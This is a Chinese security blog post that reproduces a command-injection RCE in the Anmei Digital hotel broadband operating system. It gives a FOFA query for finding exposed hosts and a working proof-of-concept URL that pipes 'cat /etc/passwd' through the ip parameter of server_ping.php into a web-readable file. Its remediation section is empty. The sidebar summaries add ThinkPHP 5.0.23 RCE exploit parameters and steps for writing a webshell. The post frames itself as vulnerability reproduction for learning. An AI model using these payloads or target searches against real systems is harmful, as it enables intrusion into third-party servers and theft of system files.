【漏洞复现】酒店宽带运营系统RCE

最新推荐文章于 2024-10-10 14:15:00 发布
最新推荐文章于 2024-10-10 14:15:00 发布
阅读量676 收藏 2
点赞数 1
分类专栏: 网络安全 web安全 渗透测试 漏洞复现 文章标签: 网络安全 漏洞复现 渗透测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/134078840
版权
本文详细介绍了安美数字酒店宽带运营系统的server_ping.php远程命令执行漏洞,包括漏洞描述、免责声明、资产确定及复现过程。利用POC可以触发漏洞,如`http://url/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >…/…/Test.txt&id=1`,然后通过访问http://url/Test.txt查看结果。文章提醒读者此类信息仅供学习,禁止非法使用。
摘要由CSDN通过智能技术生成

漏洞描述

安美数字 酒店宽带运营系统 server_ping.php 远程命令执行漏洞
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

FOFA   title="酒店宽带运营"

漏洞复现

POC:

1、http://url/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >…/…/Test.txt&id=1
2、访问http://url/Test.txt

在这里插入图片描述

修复方案

丢了少年失了心1
关注
专栏目录
订阅专栏
安美数字酒店宽带运营系统SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
10-24 379
安美数字酒店宽带运营系统存在SQL注入漏洞
安美数字酒店宽带运营系统 server_ping.php 远程命令执行漏洞
CommputerMac的博客
10-26 368
数字于2006年正式推出了中国酒店智慧客房投资运营的相关业务和商业模式,凭借雄厚的研发实力、超前的技术优势、高效整合的精英团队以及深厚的行业积淀,快速地占领了酒店行业智能化服务市场;同时依托自主创新的InnFor Anymode核心技术,创建了全高清酒店客房互动信息服务运营平台,并迅速成为了多家国际著名跨国酒店管理集团宽带、Wi-Fi网络管理服务运营、客房互动电视系统、智能客房控制等产品的特许供应商。
酒店宽带运营系统远程命令执行
梦里明明有六趣,觉后空空无大千
07-24 311
他是在社会的最低层挣扎,为了几个钱而受尽折磨;但他已不仅仅将此看作是谋生活命——职业的高贵与低贱,不能说明一个人生活的价值。恰恰相反,他现在倒很“热爱”自己的苦难。通过一段血火般的洗礼,他相信,自己历尽千辛万苦而酿造出的生活之蜜,肯定比轻而易举拿来的更有滋味——他自嘲地把自己的这种认识叫做“关于苦难的学说”……
漏洞复现】安美数字酒店宽带运营系统——server_ping.php——命令执行(CNVD-2021-37784)
LongL_GuYu的博客
06-24 674
安美数字酒店宽带运营系统 server_ping.php 存在远程命令执行漏洞漏洞文件中ip参数未过滤造成命令执行。
利用radiusmanager实战搭建认证服务器(rm)
weixin_33688840的博客
09-22 860
radius简介 RADIUS:Remote Authentication Dial In User Service,远程用户拨号认证系统由RFC2865,RFC2866定义,是目前应用最广泛的AAA协议。 RADIUS是一种C/S结构的协议,它的客户端最初就是NAS(Net Access Server)服务器,现在任何运行RADIUS客户端软件的计算机都可以成为RADI...
webmin安装php5.6,radius manager安装详细步骤
weixin_32891615的博客
03-20 477
安装radius manager 3.9 全过程手记1.安装centos 5.6。2.改MAC、IP、GATEWAY、nameserver,关闭SELINUX,重启系统。改MAC地址/etc/rc.d/rc.sysinitifconfig eth0 downifconfig eth0 hw ether 00:D0:09:B8:B7:34ifconfig eth0 up配置IP地址,因为上面改了MA...
漏洞复现】利用禅道系统RCE命令执行漏洞反弹shell
刘家华(游戏开发)
04-23 1381
禅道系统RCE漏洞复现
某商城系统 RCE漏洞复现
0xSec
12-11 1292
某商城系统的api/testOrderSubmit模块下的preview方法存在命令执行漏洞,攻击者可以向服务器写入木马文件,直接获取服务器权限
锐捷EWEB网管系统 RCE漏洞复现
0xSec
12-02 3145
Ruijie-EWEB 网管系统 flwo.control.php 中的 type 参数存在命令执行漏洞,攻击者可利用该漏洞执行任意命令,写入后门,获取服务器权限,进而控制整个web服务器。
漏洞复现】安美数字酒店宽带系统-server-ping-远程命令执行漏洞
知黑而守白
01-15 144
同时依托自主创新的InnFor Anymode核心技术,创建了全高清酒店客房互动信息服务运营平台,并迅速成为了多家国际著名跨国酒店管理集团宽带、Wi-Fi网络管理服务运营、客房互动电视系统、智能客房控制等产品的特许供应商。安美数字酒店宽带运营系统 server_ping.php 存在远程命令执行漏洞,攻击者可通过此漏洞执行任意命令,控制服务器。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8495
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2024年三个月网络安全(黑客技术)入门教程
2401_85027336的博客
09-25 2204
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全:数字时代的坚实护盾》
一名资深Java工程师的技术分享
10-10 290
在当今高度数字化的时代,网络安全的重要性如同空气对于生命一般不可或缺。它不仅关乎个人的隐私与财产安全,更对企业的生存发展和国家的稳定繁荣起着至关重要的作用。
个人网络安全的几个重点与防御
nn_84的博客
10-03 478
2 防火墙 大家都用windows 只需在 gpedit.msc 设置 但有什么未知漏洞就不得而知了 因为美国的计划问题。1 浏览器 firefox 这是第一选择 如果你真的不明白可以找找各个浏览器漏洞。3 移动设备带来的危害 比如u盘 等 对于你们认为杀毒可以 那免杀还干吗呢。网络端口溢出漏洞 但防火墙和随机地址的原因 已经可以防御。提权 这是以后遇到的问题 有些漏洞不是随机地址能够阻止。mail 的危险的 来自与代理和漏洞。浏览器溢出漏洞 实时注意更新就可以。
网络安全(黑客)自学
白帽子凯哥聊黑客
10-10 1355
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全(黑客)——自学2024
最新发布
2401_84466325的博客
10-10 1013
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-10 868
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值